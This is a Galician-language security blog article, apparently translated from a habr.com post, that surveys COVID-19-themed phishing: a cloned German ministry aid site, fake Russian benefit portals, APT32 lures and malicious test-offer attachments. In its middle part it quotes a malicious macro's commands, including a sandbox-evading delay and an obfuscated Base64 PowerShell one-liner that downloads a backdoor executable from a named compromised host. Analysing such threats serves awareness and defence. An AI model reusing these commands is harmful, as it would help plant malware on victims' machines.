Os atacantes seguen explotando o tema COVID-19, creando cada vez máis ameazas para os usuarios que están moi interesados en todo o relacionado coa epidemia. EN Xa falamos de que tipos de malware apareceron a raíz do coronavirus, e hoxe falaremos das técnicas de enxeñería social que xa se atoparon os usuarios de diferentes países, incluída Rusia. Tendencias xerais e exemplos están baixo o corte.
Lembra en Falamos sobre o feito de que a xente está disposta a ler non só sobre o coronavirus e o curso da epidemia, senón tamén sobre as medidas de apoio financeiro? Aquí tes un bo exemplo. Descubriuse un interesante ataque de phishing no estado alemán de Renania do Norte-Westfalia ou NRW. Os atacantes crearon copias do sitio web do Ministerio de Economía (), onde calquera pode solicitar axuda económica. Este programa realmente existe e resultou ser beneficioso para os estafadores. Recibidos os datos persoais das súas vítimas, realizaron unha solicitude na web real do ministerio, pero indicaron outros datos bancarios. Segundo datos oficiais, realizáronse 4 mil solicitudes falsas ata que se descubriu o esquema. Como resultado, 109 millóns de dólares destinados aos cidadáns afectados caeron en mans de defraudadores.
Queres unha proba gratuíta para o COVID-19?
Outro exemplo significativo de phishing con temática de coronavirus foi en correos electrónicos. As mensaxes chamaron a atención dos usuarios cunha oferta para someterse a probas gratuítas para detectar a infección por coronavirus. No anexo destes houbo exemplos de Trickbot/Qakbot/Qbot. E cando os que desexaban comprobar o seu estado de saúde comezaron a "cubrir o formulario adxunto", descargouse no ordenador un script malicioso. E para evitar probas de sandboxing, o script comezou a descargar o virus principal só despois dun tempo, cando os sistemas de protección estaban convencidos de que non se produciría ningunha actividade maliciosa.
Tamén foi sinxelo convencer á maioría dos usuarios de que activasen macros. Para iso, utilizouse un truco estándar: para cubrir o cuestionario, primeiro cómpre activar as macros, o que significa que cómpre executar un script VBA.
Como podes ver, o script VBA está especialmente enmascarado de antivirus.
Windows ten unha función de espera na que a aplicación espera /T <segundos> antes de aceptar a resposta predeterminada "Si". No noso caso, o script esperou 65 segundos antes de eliminar os ficheiros temporais:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
E mentres esperaba, descargouse malware. Lanzouse un script PowerShell especial para isto:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Despois de decodificar o valor Base64, o script de PowerShell descarga a porta traseira situada no servidor web previamente pirateado de Alemaña:
http://automatischer-staubsauger.com/feature/777777.pnge gárdao co nome:
C:UsersPublictmpdirfile1.exe
Dobrador ‘C:UsersPublictmpdir’ elimínase ao executar o ficheiro 'tmps1.bat' que contén o comando cmd /c mkdir ""C:UsersPublictmpdir"".
Ataque dirixido a organismos gobernamentais
Ademais, os analistas de FireEye informaron recentemente dun ataque APT32 dirixido a estruturas gobernamentais en Wuhan, así como ao Ministerio de Xestión de Emerxencias chinés. Un dos RTF distribuídos contiña unha ligazón a un artigo do New York Times titulado . Non obstante, ao lelo, descargouse malware (os analistas de FireEye identificaron a instancia como METALJACK).
Curiosamente, no momento da detección, ningún dos antivirus detectou esta instancia, segundo Virustotal.
Cando os sitios web oficiais están caídos
O exemplo máis rechamante dun ataque de phishing ocorreu en Rusia o outro día. O motivo foi o nomeamento dunha prestación moi esperada para nenos de 3 a 16 anos. Cando se anunciou o inicio da aceptación de solicitudes o 12 de maio de 2020, millóns de persoas acudiron ao sitio web de Servizos estatais en busca de axuda tan esperada e derrubaron o portal non peor que un ataque DDoS profesional. Cando o presidente dixo que "os servizos gobernamentais non podían facer fronte ao fluxo de solicitudes", a xente comezou a falar en liña sobre o lanzamento dun sitio alternativo para aceptar solicitudes.
O problema é que varios sitios comezaron a funcionar á vez, e mentres un, o real en posobie16.gosuslugi.ru, acepta solicitudes, máis .
Os compañeiros de SearchInform atoparon uns 30 novos dominios fraudulentos na zona .ru. Infosecurity e Softline Company rastrexaron máis de 70 sitios web de servizos gobernamentais falsos similares desde principios de abril. Os seus creadores manipulan símbolos coñecidos e tamén usan combinacións das palabras gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, etc.
Hype e enxeñería social
Todos estes exemplos só confirman que os atacantes están a monetizar con éxito o tema do coronavirus. E canto maior sexa a tensión social e os problemas máis pouco claros, máis posibilidades teñen os estafadores de roubar datos importantes, obrigar á xente a renunciar ao seu diñeiro por conta propia ou simplemente piratear máis ordenadores.
E dado que a pandemia obrigou a persoas potencialmente non preparadas a traballar desde casa en masa, non só os datos persoais, senón tamén os corporativos están en risco. Por exemplo, recentemente os usuarios de Microsoft 365 (anteriormente Office 365) tamén foron sometidos a un ataque de phishing. A xente recibiu mensaxes de voz masivas "perdidas" como anexos a cartas. Non obstante, os ficheiros eran en realidade unha páxina HTML á que enviaban as vítimas do ataque . Como resultado, perda de acceso e compromiso de todos os datos da conta.
Fonte: www.habr.com